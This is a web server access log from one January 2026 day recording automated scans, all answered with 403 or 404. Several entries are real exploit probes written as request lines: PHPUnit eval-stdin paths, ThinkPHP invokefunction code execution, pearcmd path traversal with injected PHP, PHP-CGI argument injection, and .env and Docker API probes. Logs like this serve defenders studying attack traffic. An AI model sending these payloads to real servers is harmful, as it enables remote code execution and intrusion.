24.65.233.27 - - [26/Jan/2026:13:40:54 -0500] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 308 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:40:57 -0500] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 304 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:00 -0500] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 300 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:03 -0500] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 307 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:05 -0500] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:07 -0500] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:10 -0500] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 301 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:13 -0500] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 297 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:16 -0500] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 293 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:18 -0500] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:21 -0500] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:24 -0500] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 301 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:27 -0500] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 297 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:29 -0500] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:32 -0500] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 320 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:35 -0500] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:37 -0500] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 315 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:40 -0500] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:43 -0500] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:45 -0500] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:48 -0500] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 315 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:50 -0500] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:53 -0500] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:55 -0500] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 320 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:41:58 -0500] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:00 -0500] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:03 -0500] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:05 -0500] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:08 -0500] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:11 -0500] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:14 -0500] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:16 -0500] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 329 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:19 -0500] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:21 -0500] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:24 -0500] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:27 -0500] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:29 -0500] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 271 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:31 -0500] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 278 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:34 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 271 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:37 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 271 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:42:39 -0500] "GET /containers/json HTTP/1.1" 404 277 "-" "libredtail-http"
167.99.149.55 - - [26/Jan/2026:13:59:36 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
204.76.203.212 - - [26/Jan/2026:13:59:57 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
101.33.66.34 - - [26/Jan/2026:14:04:38 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
193.142.147.209 - - [26/Jan/2026:14:06:02 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
165.227.214.138 - - [26/Jan/2026:14:07:26 -0500] "GET / HTTP/1.1" 403 271 "-" "-"
165.227.214.138 - - [26/Jan/2026:14:07:26 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/538.41 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
93.174.93.12 - - [26/Jan/2026:14:08:00 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Moto G Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
40.124.175.30 - - [26/Jan/2026:14:22:02 -0500] "GET /developmentserver/metadatauploader HTTP/1.1" 404 296 "-" "Mozilla/5.0 zgrab/0.x"
204.76.203.212 - - [26/Jan/2026:14:26:03 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
173.249.11.249 - - [26/Jan/2026:14:40:21 -0500] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 273 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:21 -0500] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 262 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:22 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 312 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:22 -0500] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 308 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:22 -0500] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 304 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:23 -0500] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 300 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:23 -0500] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 307 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:24 -0500] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:24 -0500] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:24 -0500] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 301 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:25 -0500] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 297 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:25 -0500] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 293 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:26 -0500] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:26 -0500] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:26 -0500] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 301 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:27 -0500] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 297 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:27 -0500] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:28 -0500] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 320 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:28 -0500] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:28 -0500] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 315 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:29 -0500] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:29 -0500] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:29 -0500] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:30 -0500] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 315 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:30 -0500] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:30 -0500] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:30 -0500] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 320 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:31 -0500] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:31 -0500] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:31 -0500] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:32 -0500] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:32 -0500] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:33 -0500] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:33 -0500] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:34 -0500] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 329 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:34 -0500] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:35 -0500] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:36 -0500] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 317 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:37 -0500] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 316 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:38 -0500] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 271 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:39 -0500] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 278 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:41 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 271 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:42 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 271 "-" "libredtail-http"
173.249.11.249 - - [26/Jan/2026:14:40:43 -0500] "GET /containers/json HTTP/1.1" 404 277 "-" "libredtail-http"
192.142.25.95 - - [26/Jan/2026:14:45:55 -0500] "GET / HTTP/1.1" 403 261 "-" "-"
204.76.203.212 - - [26/Jan/2026:14:49:56 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.157.95.131 - - [26/Jan/2026:15:12:57 -0500] "GET / HTTP/1.1" 403 267 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:15:16:43 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.136.202 - - [26/Jan/2026:15:41:05 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:15:42:01 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.236.176.201 - - [26/Jan/2026:15:48:29 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
204.76.203.212 - - [26/Jan/2026:16:03:51 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
217.73.83.42 - - [26/Jan/2026:16:17:54 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:16:29:02 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD /wordpress/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; moto g31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.96 Mobile Safari/537.36"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD /old/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 10; en-US; CPH2015) AppleWebKit/537.36 (KHTML, like Gecko) UCBrowser/13.5.8.1311 Mobile Safari/537.36"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD /blog/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 14; Xiaomi 14 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.33 Mobile Safari/537.36"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD /backup/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; moto g31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.96 Mobile Safari/537.36"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD /wp/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD /new/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 13; Pixel 7a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.82 Mobile Safari/537.36"
34.56.9.63 - - [26/Jan/2026:16:41:09 -0500] "HEAD / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Linux; Android 14; SM-A146P) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/25.0 Chrome/123.0.6312.120 Mobile Safari/537.36"
85.217.149.4 - - [26/Jan/2026:16:42:06 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)"
193.142.147.209 - - [26/Jan/2026:16:44:24 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
5.61.209.92 - - [26/Jan/2026:16:46:30 -0500] "GET /SDK/webLanguage HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:16:54:39 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:17:19:31 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.142.154.103 - - [26/Jan/2026:17:30:58 -0500] "GET /version HTTP/1.1" 404 269 "-" "-"
45.142.154.103 - - [26/Jan/2026:17:30:59 -0500] "GET / HTTP/1.1" 403 266 "-" "-"
45.142.154.103 - - [26/Jan/2026:17:30:59 -0500] "GET / HTTP/1.1" 403 266 "-" "-"
45.142.154.103 - - [26/Jan/2026:17:31:00 -0500] "GET /v1 HTTP/1.1" 404 264 "-" "-"
45.142.154.103 - - [26/Jan/2026:17:31:00 -0500] "GET / HTTP/1.1" 403 266 "-" "-"
45.142.154.103 - - [26/Jan/2026:17:31:01 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:17:44:45 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.168.34.34 - - [26/Jan/2026:17:54:39 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.34 - - [26/Jan/2026:17:54:55 -0500] "GET /wiki HTTP/1.1" 404 266 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
204.76.203.212 - - [26/Jan/2026:18:12:08 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:18:35:27 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.131.228 - - [26/Jan/2026:18:49:40 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
193.142.147.209 - - [26/Jan/2026:18:56:14 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.212 - - [26/Jan/2026:19:00:12 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:19:25:44 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
202.158.8.110 - - [26/Jan/2026:19:31:54 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
204.76.203.69 - - [26/Jan/2026:19:50:37 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:19:52:44 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.65 - - [26/Jan/2026:20:02:58 -0500] "GET / HTTP/1.1" 403 271 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
204.76.203.212 - - [26/Jan/2026:20:19:38 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.83.31.70 - - [26/Jan/2026:20:27:46 -0500] "GET /.env HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.83.31.70 - - [26/Jan/2026:20:27:46 -0500] "GET /wp-content/ HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
204.76.203.212 - - [26/Jan/2026:20:40:56 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:21:09:48 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [26/Jan/2026:21:19:21 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.212 - - [26/Jan/2026:21:33:47 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.18 - - [26/Jan/2026:21:45:26 -0500] "GET / HTTP/1.1" 403 266 "-" "-"
43.157.98.187 - - [26/Jan/2026:21:48:19 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:21:59:23 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
